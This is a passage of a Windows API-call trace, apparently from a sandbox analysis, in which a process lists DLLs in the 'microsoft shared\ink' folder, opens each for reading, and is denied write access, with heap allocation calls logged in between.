hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a1d507, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xde1acd8d, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xde1acd8d, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x612e00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="mraut.dll", cAlternateFileName="")) returned 1 [0085.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0085.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0085.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0085.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0085.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0085.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0085.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0085.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0085.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0085.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0085.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fe78 [0085.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0085.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e580 [0085.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fe78 | out: hHeap=0x20000) returned 1 [0085.435] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.435] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.435] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.435] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0085.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0085.435] AreFileApisANSI () returned 1 [0085.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll", lpUsedDefaultChar=0x0) returned 61 [0085.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0085.435] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.435] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0085.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0085.435] AreFileApisANSI () returned 1 [0085.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0085.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6df20 [0085.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6df20, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll") returned 61 [0085.435] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x354 [0085.435] GetFileType (hFile=0x354) returned 0x1 [0085.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0085.436] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0085.436] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0085.436] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0085.436] CloseHandle (hObject=0x354) returned 1 [0085.436] AreFileApisANSI () returned 1 [0085.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0085.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6ecf0 [0085.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6ecf0, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll") returned 61 [0085.436] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.436] GetLastError () returned 0x5 [0085.436] GetLastError () returned 0x5 [0085.437] SetLastError (dwErrCode=0x5) [0085.437] GetLastError () returned 0x5 [0085.437] SetLastError (dwErrCode=0x5) [0085.437] GetLastError () returned 0x5 [0085.437] SetLastError (dwErrCode=0x5) [0085.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0085.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0085.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0085.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0085.437] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.437] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.437] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c3a52f7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3c3a52f7, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3c3a52f7, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xc800, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="mshwgst.dll", cAlternateFileName="")) returned 1 [0085.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0085.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0085.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0085.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0085.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0085.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0085.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0085.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0085.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0085.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fbb8 [0085.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0085.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0085.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fbb8 | out: hHeap=0x20000) returned 1 [0085.438] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.438] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.438] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.438] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0085.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0085.438] AreFileApisANSI () returned 1 [0085.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwgst.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwgst.dll", lpUsedDefaultChar=0x0) returned 63 [0085.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0085.438] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.438] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0085.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0085.438] AreFileApisANSI () returned 1 [0085.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0085.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6e4f8 [0085.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x6e4f8, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwgst.dll") returned 63 [0085.438] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwgst.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mshwgst.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x354 [0085.448] GetFileType (hFile=0x354) returned 0x1 [0085.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0085.448] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0085.448] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0085.448] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0085.448] CloseHandle (hObject=0x354) returned 1 [0085.448] AreFileApisANSI () returned 1 [0085.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0085.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6e608 [0085.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x6e608, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwgst.dll") returned 63 [0085.449] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwgst.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mshwgst.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.449] GetLastError () returned 0x5 [0085.449] GetLastError () returned 0x5 [0085.449] SetLastError (dwErrCode=0x5) [0085.449] GetLastError () returned 0x5 [0085.449] SetLastError (dwErrCode=0x5) [0085.449] GetLastError () returned 0x5 [0085.449] SetLastError (dwErrCode=0x5) [0085.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0085.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0085.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0085.449] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.449] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.449] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c8ce781, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe3805ad4, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe3805ad4, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x106a00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="mshwLatin.dll", cAlternateFileName="")) returned 1 [0085.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0085.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0085.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0085.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0085.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0085.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0085.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0085.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0085.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0085.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0085.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ad80 [0085.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0085.450] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.450] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.450] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.450] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0085.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.450] AreFileApisANSI () returned 1 [0085.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwLatin.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwLatin.dll", lpUsedDefaultChar=0x0) returned 65 [0085.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6dc60 [0085.450] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.450] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0085.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0085.450] AreFileApisANSI () returned 1 [0085.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6dc60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0085.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82cb8 [0085.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6dc60, cbMultiByte=-1, lpWideCharStr=0x82cb8, cchWideChar=65 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwLatin.dll") returned 65 [0085.451] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwLatin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mshwlatin.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x354 [0085.451] GetFileType (hFile=0x354) returned 0x1 [0085.451] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82cb8 | out: hHeap=0x20000) returned 1 [0085.451] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0085.451] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0085.451] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0085.451] CloseHandle (hObject=0x354) returned 1 [0085.452] AreFileApisANSI () returned 1 [0085.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6dc60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0085.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x81fc8 [0085.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6dc60, cbMultiByte=-1, lpWideCharStr=0x81fc8, cchWideChar=65 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwLatin.dll") returned 65 [0085.452] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwLatin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mshwlatin.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.452] GetLastError () returned 0x5 [0085.452] GetLastError () returned 0x5 [0085.452] SetLastError (dwErrCode=0x5) [0085.452] GetLastError () returned 0x5 [0085.452] SetLastError (dwErrCode=0x5) [0085.452] GetLastError () returned 0x5 [0085.452] SetLastError (dwErrCode=0x5) [0085.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81fc8 | out: hHeap=0x20000) returned 1 [0085.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0085.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0085.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dc60 | out: hHeap=0x20000) returned 1 [0085.452] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.452] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.452] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076bff5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, 